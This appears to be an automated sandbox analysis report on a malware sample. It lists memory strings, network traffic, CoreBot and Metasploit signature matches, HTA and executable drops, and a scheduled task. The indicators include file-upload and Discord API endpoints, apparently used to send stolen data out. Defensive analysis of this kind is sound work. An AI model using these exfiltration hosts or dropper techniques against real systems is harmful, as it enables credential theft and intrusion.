Source: chromium.exe, 0000001B.00000003.2483933287.000001D12777C000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/servers
Source: chromium.exe, 0000001B.00000003.2517030911.000001D126857000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522653031.000001D126857000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.my-ip.io/v2/ip.json
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arstechnica.com/civis/viewtopic.php?f=19&t=465002.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.famzah.net/2014/09/24/.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bootlin.com/blog/find-root-device/
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515605058.000001D127750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://canary.discord.com/api/v9/users/
Source: chromium.exe, 0000001B.00000003.2516044593.000001D127763000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515605058.000001D127750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/P
Source: powershell.exe, 00000008.00000002.1803490046.000001F331CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1803490046.000001F331CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1803490046.000001F331CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chromium.exe, 0000001B.00000003.2516044593.000001D127763000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515605058.000001D127750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2524285527.000001D1267EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2534285511.000001D12638C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517682930.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000008.00000002.1770913315.000001F321E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/famzah/linux-memavailable-procfs/issues/2
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/1915).
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/906.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/966.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, chromium.exe, 0000001B.00000002.2561687497.00007FFE112E1000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542613082.000001D126C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/procps-ng/procps/blob/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/procps-ng/procps/issues/42
Source: powershell.exe, 00000005.00000002.1708938905.0000000004DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1770913315.000001F32289D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io
Source: chromium.exe, 0000001B.00000003.2483933287.000001D12777C000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/uploadFiles
Source: chromium.exe, 0000001B.00000002.2543092278.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517682930.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: chromium.exe, 0000001B.00000003.2517030911.000001D126857000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522653031.000001D126857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.top/api
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.top/apiaapiu67c80b19fb14a574c00e5c7aauseridafalseaantivmuawebhookaexecuteu
Source: chromium.exe, 0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.top/apip
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000005.00000002.1711867660.000000000565A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1803490046.000001F331E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1803490046.000001F331CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nuitka.net/info/segfault.html
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nuitka.net/info/segfault.htmlfor
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2544000871.000001D127190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB10A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0506/
Source: chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515319092.000001D127039000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2515319092.000001D127039000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: chromium.exe, 0000001B.00000002.2543092278.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2517682930.000001D126D3B000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2520210832.000001D12642B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: chromium.exe, 0000001B.00000003.2487491640.000001D126E77000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2483933287.000001D12777C000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2487053834.000001D127573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://up1.fileditch.com/upload.php
Source: chromium.exe, 0000001B.00000002.2545424502.000001D127F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://up1.fileditch.com/upload.phpec
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ibm.com/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AABE6000.00000004.00000020.00020000.00000000.sdmp, SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000003.2524102396.000001D12675B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB10A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB10A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: chromium.exe, 0000001B.00000003.2519660137.000001D126C7D000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2542841607.000001D126C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.systutorials.com/how-to-find-the-disk-where-root-is-on-in-bash-on-linux/.
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235A9CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node4.html
Source: chromium.exe, 0000001B.00000003.2516413708.000001D126EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: chromium.exe, 0000001B.00000002.2543218981.000001D126DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: chromium.exe, 0000001B.00000003.2522278344.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2543092278.000001D126CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443

Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49941 version: TLS 1.2

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00AEEAFF

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AEED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00AEED6A

Source: C:\Users\user\Desktop\5c9465cda4.exe

0_2_00AEEAFF

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ADAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00ADAA57

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00B09576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00B09576

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.0.ce4pMzk.exe.21039bd3fe8.1.unpack, type: UNPACKEDPE	Matched rule: Detects CoreBot Author: ditekSHen
Source: 28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects CoreBot Author: ditekSHen
Source: 28.0.ce4pMzk.exe.21039bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects CoreBot Author: ditekSHen
Source: 00000040.00000002.2948533861.000000000DF1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000040.00000002.2948533861.000000000DEC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000040.00000002.2948533861.000000000DFAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe, type: DROPPED	Matched rule: Detects CoreBot Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe, type: DROPPED	Matched rule: Detects CoreBot Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe, type: DROPPED	Matched rule: Detects CoreBot Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: 5c9465cda4.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 5c9465cda4.exe, 00000000.00000000.1664651285.0000000000B32000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6f1d25b0-2
Source: 5c9465cda4.exe, 00000000.00000000.1664651285.0000000000B32000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_79047f7f-d

Creates HTA files

Source: C:\Users\user\Desktop\5c9465cda4.exe	File created: C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	File created: C:\Users\user\AppData\Local\Temp\SyboFREGa.hta
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Temp\4LrdSfC7c.hta

PE file contains section with special chars

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name:
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: .idata
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name:
Source: rapes.exe.10.dr	Static PE information: section name:
Source: rapes.exe.10.dr	Static PE information: section name: .idata
Source: rapes.exe.10.dr	Static PE information: section name:
Source: random[1].exe0.20.dr	Static PE information: section name:
Source: random[1].exe0.20.dr	Static PE information: section name: .idata
Source: random[1].exe0.20.dr	Static PE information: section name:
Source: df7baf8347.exe.20.dr	Static PE information: section name:
Source: df7baf8347.exe.20.dr	Static PE information: section name: .idata
Source: df7baf8347.exe.20.dr	Static PE information: section name:
Source: random[2].exe.20.dr	Static PE information: section name:
Source: random[2].exe.20.dr	Static PE information: section name: .idata
Source: random[2].exe.20.dr	Static PE information: section name:
Source: f5042cb50f.exe.20.dr	Static PE information: section name:
Source: f5042cb50f.exe.20.dr	Static PE information: section name: .idata
Source: f5042cb50f.exe.20.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Jump to dropped file

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ADD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00ADD5EB

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00AD1201

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00ADE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00ADE8F6

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A78060	0_2_00A78060
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE2046	0_2_00AE2046
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AD8298	0_2_00AD8298
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AAE4FF	0_2_00AAE4FF
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AA676B	0_2_00AA676B
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00B04873	0_2_00B04873
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A9CAA0	0_2_00A9CAA0
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A7CAF0	0_2_00A7CAF0
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A8CC39	0_2_00A8CC39
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AA6DD9	0_2_00AA6DD9
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A8D07D	0_2_00A8D07D
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A791C0	0_2_00A791C0
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A8B119	0_2_00A8B119
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A91394	0_2_00A91394
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A91706	0_2_00A91706
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A9781B	0_2_00A9781B
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A919B0	0_2_00A919B0
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A77920	0_2_00A77920
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A8997D	0_2_00A8997D
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A97A4A	0_2_00A97A4A
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A97CA7	0_2_00A97CA7
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A91C77	0_2_00A91C77
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AA9EEE	0_2_00AA9EEE
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AFBE44	0_2_00AFBE44
